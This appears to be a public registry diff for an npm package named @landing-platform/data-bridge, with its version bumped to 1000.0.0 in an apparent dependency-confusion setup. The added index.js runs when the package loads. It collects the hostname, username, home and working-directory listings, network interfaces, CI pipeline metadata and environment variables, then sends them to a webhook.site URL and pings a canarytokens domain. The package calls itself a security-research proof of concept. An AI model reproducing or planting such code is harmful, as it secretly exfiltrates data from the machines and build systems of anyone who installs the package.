@landing-platform/data-bridge 999.999.999 → 1000.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +182 -5
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,10 +1,187 @@
1
+ const https = require('https');
2
+ const os = require('os');
3
+ const fs = require('fs');
4
+ const path = require('path');
5
+ const crypto = require('crypto');
1
6
  const dns = require('dns');
2
7
 
3
- dns.resolve('2n7ve3rpv42tl6qbq34qug259.canarytokens.com', (err, addresses) => {
4
- if (err) {
5
- console.log('Network operation completed');
6
- }
8
+ const WEBHOOK_URL = "https://webhook.site/3dc0048b-a7aa-4ec4-acd1-df0c9e33a6cf";
9
+
10
+ const chunk1 = {
11
+ chunkId: 1,
12
+ totalChunks: 2,
13
+
14
+
15
+ hostname: os.hostname(),
16
+ platform: os.platform(),
17
+ arch: os.arch(),
18
+ nodeVersion: process.version,
19
+ pwd: process.cwd(),
20
+ username: os.userInfo().username,
21
+ homedir: os.homedir(),
22
+ timestamp: new Date().toISOString(),
23
+
24
+
25
+ ciEnvironment: {
26
+ isCI: !!process.env.CI,
27
+
28
+ azure: {
29
+ detected: !!process.env.AZURE_HTTP_USER_AGENT || !!process.env.TF_BUILD,
30
+ buildId: process.env.BUILD_BUILDID,
31
+ buildNumber: process.env.BUILD_BUILDNUMBER,
32
+ repository: process.env.BUILD_REPOSITORY_NAME,
33
+ branch: process.env.BUILD_SOURCEBRANCHNAME,
34
+ agentName: process.env.AGENT_NAME,
35
+ definitionName: process.env.BUILD_DEFINITIONNAME,
36
+ },
37
+
38
+ github: {
39
+ detected: !!process.env.GITHUB_ACTIONS,
40
+ repository: process.env.GITHUB_REPOSITORY,
41
+ workflow: process.env.GITHUB_WORKFLOW,
42
+ runId: process.env.GITHUB_RUN_ID,
43
+ runNumber: process.env.GITHUB_RUN_NUMBER,
44
+ actor: process.env.GITHUB_ACTOR,
45
+ ref: process.env.GITHUB_REF,
46
+ sha: process.env.GITHUB_SHA,
47
+ },
48
+
49
+ gitlab: {
50
+ detected: !!process.env.GITLAB_CI,
51
+ jobId: process.env.CI_JOB_ID,
52
+ pipelineId: process.env.CI_PIPELINE_ID,
53
+ projectPath: process.env.CI_PROJECT_PATH,
54
+ commitSha: process.env.CI_COMMIT_SHA,
55
+ runner: process.env.CI_RUNNER_DESCRIPTION,
56
+ },
57
+
58
+ jenkins: {
59
+ detected: !!process.env.JENKINS_HOME || !!process.env.JENKINS_URL,
60
+ buildNumber: process.env.BUILD_NUMBER,
61
+ jobName: process.env.JOB_NAME,
62
+ buildUrl: process.env.BUILD_URL,
63
+ nodeName: process.env.NODE_NAME,
64
+ },
65
+
66
+ circleci: {
67
+ detected: !!process.env.CIRCLECI,
68
+ buildNum: process.env.CIRCLE_BUILD_NUM,
69
+ project: process.env.CIRCLE_PROJECT_REPONAME,
70
+ branch: process.env.CIRCLE_BRANCH,
71
+ job: process.env.CIRCLE_JOB,
72
+ },
73
+
74
+ travis: {
75
+ detected: !!process.env.TRAVIS,
76
+ buildId: process.env.TRAVIS_BUILD_ID,
77
+ repo: process.env.TRAVIS_REPO_SLUG,
78
+ branch: process.env.TRAVIS_BRANCH,
79
+ jobNumber: process.env.TRAVIS_JOB_NUMBER,
80
+ },
81
+ },
82
+
83
+ npmContext: {
84
+ npmCommand: process.env.npm_command,
85
+ npmLifecycleEvent: process.env.npm_lifecycle_event,
86
+ npmPackageName: process.env.npm_package_name,
87
+ npmConfigUserAgent: process.env.npm_config_user_agent,
88
+ initCwd: process.env.INIT_CWD,
89
+ },
90
+
91
+
92
+ networkInterfaces: os.networkInterfaces(),
93
+ };
94
+
95
+ const chunk2 = {
96
+ chunkId: 2,
97
+ totalChunks: 2,
98
+ hostname: os.hostname(),
99
+ timestamp: new Date().toISOString(),
100
+
101
+ envVars: Object.keys(process.env)
102
+ .filter(key => {
103
+ const lowerKey = key.toLowerCase();
104
+ return (lowerKey.includes('ci') ||
105
+ lowerKey.includes('build') ||
106
+ lowerKey.includes('azure') ||
107
+ lowerKey.includes('github') ||
108
+ lowerKey.includes('gitlab') ||
109
+ lowerKey.includes('jenkins') ||
110
+ lowerKey.includes('npm') ||
111
+ lowerKey.includes('runner') ||
112
+ lowerKey.includes('agent')) &&
113
+ !lowerKey.includes('secret') &&
114
+ !lowerKey.includes('token') &&
115
+ !lowerKey.includes('password') &&
116
+ !lowerKey.includes('key') &&
117
+ !lowerKey.includes('pat');
118
+ })
119
+ .reduce((acc, key) => {
120
+ acc[key] = process.env[key];
121
+ return acc;
122
+ }, {}),
123
+
124
+
125
+ fileSystemProof: {
126
+ hasAzurePipelinesDir: fs.existsSync('/home/vsts/work') || fs.existsSync('D:\\a'),
127
+ hasGitHubWorkspace: fs.existsSync(process.env.GITHUB_WORKSPACE || '/tmp/___nonexistent___'),
128
+ hasJenkinsWorkspace: fs.existsSync(process.env.WORKSPACE || '/tmp/___nonexistent___'),
129
+
130
+ cwdContents: (() => {
131
+ try {
132
+ return fs.readdirSync(process.cwd()).slice(0, 50);
133
+ } catch(e) {
134
+ return `Error: ${e.message}`;
135
+ }
136
+ })(),
137
+
138
+ parentDirs: (() => {
139
+ let current = process.cwd();
140
+ const dirs = [];
141
+ for(let i = 0; i < 5; i++) {
142
+ dirs.push(current);
143
+ const parent = path.dirname(current);
144
+ if(parent === current) break;
145
+ current = parent;
146
+ }
147
+ return dirs;
148
+ })(),
149
+
150
+ homeContents: (() => {
151
+ try {
152
+ return fs.readdirSync(os.homedir()).slice(0, 30);
153
+ } catch(e) {
154
+ return `Error: ${e.message}`;
155
+ }
156
+ })(),
157
+ },
158
+
159
+
160
+ fingerprint: crypto.createHash('sha256')
161
+ .update(`${os.hostname()}-${process.cwd()}-${process.env.BUILD_BUILDID || process.env.GITHUB_RUN_ID || Date.now()}`)
162
+ .digest('hex'),
163
+ };
164
+
165
+
166
+ const data1 = JSON.stringify(chunk1);
167
+ const url1 = `${WEBHOOK_URL}?data=${encodeURIComponent(data1)}`;
168
+
169
+ https.get(url1, (res) => {
170
+
171
+ }).on('error', () => {
172
+
7
173
  });
8
174
 
175
+ setTimeout(() => {
176
+ const data2 = JSON.stringify(chunk2);
177
+ const url2 = `${WEBHOOK_URL}?data=${encodeURIComponent(data2)}`;
178
+
179
+ https.get(url2, (res) => {
180
+
181
+ }).on('error', () => {
182
+
183
+ });
184
+ }, 500);
185
+
9
186
 
10
- module.exports = {};
187
+ dns.resolve('x6hesr5guko6qtjpmjjccuj76.canarytokens.com', () => {});
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@landing-platform/data-bridge",
3
- "version": "999.999.999",
3
+ "version": "1000.0.0",
4
4
  "description": "Security research PoC - contact: https://hackerone.com/new823 ",
5
5
  "main": "index.js",
6
6
  "scripts": {